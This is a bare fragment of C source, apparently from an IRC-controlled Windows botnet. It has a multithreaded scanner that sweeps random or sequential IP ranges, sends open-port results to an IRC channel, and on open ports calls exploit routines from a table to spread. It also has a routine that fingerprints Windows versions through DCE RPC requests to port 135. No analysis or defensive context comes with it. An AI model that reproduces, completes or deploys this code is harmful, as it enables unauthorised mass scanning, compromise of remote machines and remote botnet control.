DWORD WINAPI AdvPortScanner(LPVOID param) { IN_ADDR in; char logbuf[LOGLINE]; ADVSCAN scan = *((ADVSCAN *)param); ADVSCAN *scanp = (ADVSCAN *)param; scanp->cgotinfo = TRUE; int threadnum=scan.cthreadnum; int threadid=scan.cthreadid; srand(GetTickCount()); while (advinfo[threads[threadnum].parent].info) { DWORD dwIP; if (scan.random) dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent); else dwIP = AdvGetNextIP(threads[threadnum].parent); in.s_addr = dwIP; sprintf(logbuf,"IP: %s:%d, Scan thread: %d, Sub-thread: %d.", finet_ntoa(in), scan.port, threads[threadnum].parent, threadid); sprintf(threads[threadnum].name, logbuf); if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) { if (scan.exploit == -1) { EnterCriticalSection(&CriticalSection); sprintf(logbuf,"IP: %s, Port %d is open.",finet_ntoa(in),scan.port); if (!scan.silent) { if (scan.msgchan[0] != '\0') irc_privmsg(scan.sock,scan.msgchan,logbuf,scan.notice, TRUE); else irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE); } addlog(logbuf); LeaveCriticalSection(&CriticalSection); } else { EXINFO exinfo; sprintf(exinfo.ip, finet_ntoa(in)); sprintf(exinfo.command, exploit[scan.exploit].command); if (scan.msgchan[0] != '\0') sprintf(exinfo.chan, scan.msgchan); else sprintf(exinfo.chan, scan.chan); exinfo.sock = scan.sock; exinfo.notice = scan.notice; exinfo.silent = scan.silent; exinfo.port = scan.port; exinfo.threadnum = threadnum; exinfo.exploit = scan.exploit; exploit[scan.exploit].exfunc(exinfo); } } Sleep(2000); } clearthread(threadnum); ExitThread(0); }
int FpHost(const char *szHost, int iFpType) { switch(iFpType) { case FP_RPC: { char szRecvBuf[8192]; int iRetVal=OS_UNKNOWN; int sSocket=fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sSocket==SOCKET_ERROR || sSocket==INVALID_SOCKET) return OS_UNKNOWN; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(135); ssin.sin_addr.s_addr=ResolveAddress((char *)szHost); int iErr=fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)); if(iErr!=SOCKET_ERROR) { iErr=fsend(sSocket, rpcfp_bindstr, sizeof(rpcfp_bindstr)-1, 0); if(iErr==SOCKET_ERROR) { fclosesocket(sSocket); return iRetVal; } iErr=frecv(sSocket, szRecvBuf, sizeof(szRecvBuf), 0); if(iErr==SOCKET_ERROR) { fclosesocket(sSocket); return iRetVal; } if(szRecvBuf[2]==DCE_PKT_BINDACK) { iErr=fsend(sSocket, rpcfp_inqifids, sizeof(rpcfp_inqifids)-1,0); if(iErr==SOCKET_ERROR) { fclosesocket(sSocket); return iRetVal; } iErr=frecv(sSocket, szRecvBuf, sizeof(szRecvBuf),0); if(iErr==SOCKET_ERROR) { fclosesocket(sSocket); return iRetVal; } if(szRecvBuf[2]==DCE_PKT_RESPONSE) { if(MemContains(szRecvBuf, iErr, w2kuuid_sig, sizeof(w2kuuid_sig)-1)) { if(iErr<300) iRetVal=OS_WINNT; else iRetVal=OS_WIN2K; } else if(MemContains(szRecvBuf, iErr, wxpuuid_sig, sizeof(wxpuuid_sig)-1)) iRetVal=OS_WINXP; else iRetVal=OS_UNKNOWN; } else { fclosesocket(sSocket); return iRetVal; } } else { fclosesocket(sSocket); return iRetVal; } } else { fclosesocket(sSocket); return iRetVal; } fclosesocket(sSocket); return iRetVal; } break; case FP_PORT5K: if(AdvPortOpen(finet_addr(szHost), 5000, 3)) return OS_WINXP; break; case FP_TTL: return OS_UNKNOWN; break; default: return OS_UNKNOWN; break; } return OS_UNKNOWN; }